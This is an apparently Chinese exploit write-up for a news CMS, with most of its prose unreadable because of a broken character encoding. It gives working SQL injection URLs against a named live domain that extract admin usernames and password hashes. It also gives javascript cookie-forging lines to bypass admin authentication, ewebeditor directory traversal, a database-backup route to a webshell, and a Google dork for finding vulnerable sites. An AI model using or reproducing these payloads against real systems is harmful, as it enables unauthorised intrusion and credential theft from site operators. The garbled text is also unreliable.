Ѷʱ©ܽ
by:Ѫ䳾ҲʲôѶʱ師..Ҹ˾ʱֲֻˣŰ汾ĸ£
±ܽԺڷȥ9־ϵ...
˵һע:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
ǵǧ˿ոҲվʱͷֶ˿ոע벻
һע
Чͼ:
ͺɿԵõû..md5ȥƽ.ڰȫʶ.
븴..Ƴ..ôǿͨcookiesƭȥ
javascript:alert(document.cookie="adminuser="+escape("û"));javascript:alert(document.cookie="adminpass="+escape("md5ֵ")); javascript:alert(document.cookie="admindj="+escape("1"));
ôͻһ..̨Ҳզ??뿴һ©ɴﵽҪЧ:
ΪѶʱewebeditor..ûڴʱewebeditorиĿ¼©
֤..Ѷʱûõĵط֤..ǿͨcookiesƭƹ֤.Ӷ
ҳĿ¼..:
javascript:alert(document.cookie="admindj=1")
http://www.political-security.co ... asp?id=46&dir=../..
Чͼ:
ȫվĿ¼..ҵ̨Ŀ¼..ȥ..
ô˺̨ôshellϴ--ݾok..
ôʱЩ̨ܵʱѱҳȥ...ﱸҳ滹Ǵڵ..
Ҳһ..㶼ͨĿ¼ʵ..
javascript:alert(document.cookie="admindj=1")
http://www.political-security.co ... p?action=BackupData
ok..
ô©ס...զ??DZȽϳ..ôһע©?
adminĿ¼иadmin_lm_edit.aspҳ..idûй ôǾͿcookies
Ȼʴҳע..:
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
Ȼadmin/admin_chk.aspҳ
עadmin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
Чͼʾ:
Ѷʱ©2
googleؼ֣inurl:news_more.asp?lm2= ؼֺܶԼɣ
1/admin/admin_news_pl_view.asp?id=1
//id
2ʱ1ʾϢʱ234˵11ҵҳ棬ƣ
3|'+dfirst("","")+chr(124)+dfirst("",""),username='
Աʺź
4cookies̨
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
5̨cookieֱ֤ӷhttp://www.political-security.com/admin/admin_index.aspOKˣ
6̨ϴͱȡSHELLѡ
7ѶʱиĿ¼©http://www.political-security.co ... asp?id=46&dir=../..
ңҸһѶʱcms4.1汾ûݿⱸݲ֪ôSHELLе˵Ȼ̨ʾҳǴڵģ¼̨ http://www.political-security.com/admin/admin_db_backup.asp?action=BackupDataûУأ˭취ṩһ£лл
ҳ:
[1]